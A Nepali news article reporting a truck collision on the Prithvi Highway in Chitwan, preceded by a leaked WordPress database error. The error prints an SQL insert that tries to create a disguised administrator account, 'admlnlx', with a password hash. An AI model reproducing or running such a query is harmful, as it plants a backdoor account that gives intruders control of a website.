WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/PGUSxF1yCVm/NtYlTSX63LkE6q8A1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 22:19:20', '', 'admlnlx', 'admlnlx')
चितवन,माघ १८ –
काठमाडौँबाट नारायणगढतर्फ आउँदै गरेको ट्रक र वीरगन्जबाट काठमाडौँतर्फ जाँदै गरेको ट्रक दारेचोक–७ चुङ खोलास्थित पृथ्वी राजमार्गमा आज बिहान एकापसमा ठक्कर खाँदा चालक र सहचालक गरी तीनजना घाइते भएका छन् ।
जिल्ला प्रहरी कार्यालय चितवनले दिएको जानकारी अनुसार नारायणगढतर्फ आउँदै गरेको ना ६ ख ८१२७ नम्बरको ट्रक र विपरीत दिशातर्फ जाँदै गरेको ना ५ ख ८६६२ नम्बरको ट्रक आज बिहान ३ः३० बजे एकापसमा ठोक्किएका हुन् । दुर्घटनामा परी ना ५ ख ८६६२ नम्बरका ट्रक चालक मकवानपुर भैसे गाविस–२ का ४० वर्षीय पशुपति थापा गम्भीर घाइते भएका छन् ।
सोही ट्रकका सोही ठाउँका सहचालक २२ वर्षीय विमल आलेमगर र अर्का ट्रकका चालक दोलखाका २८ वर्षीय राजु लामा पनि घाइते भएका छन् । उनीहरुलाई उपचारको लागि काठमाडौँ लगिएको प्रहरीले जनाएको छ ।
दुई ट्रक ठोक्किएपछि अवरुद्ध सडक एकतर्फी खुलाइएको प्रहरीले जनाएको छ । घटनास्थल मुग्लिनबाट १० किलोमिटर काठमाडौँतर्फ पर्दछ ।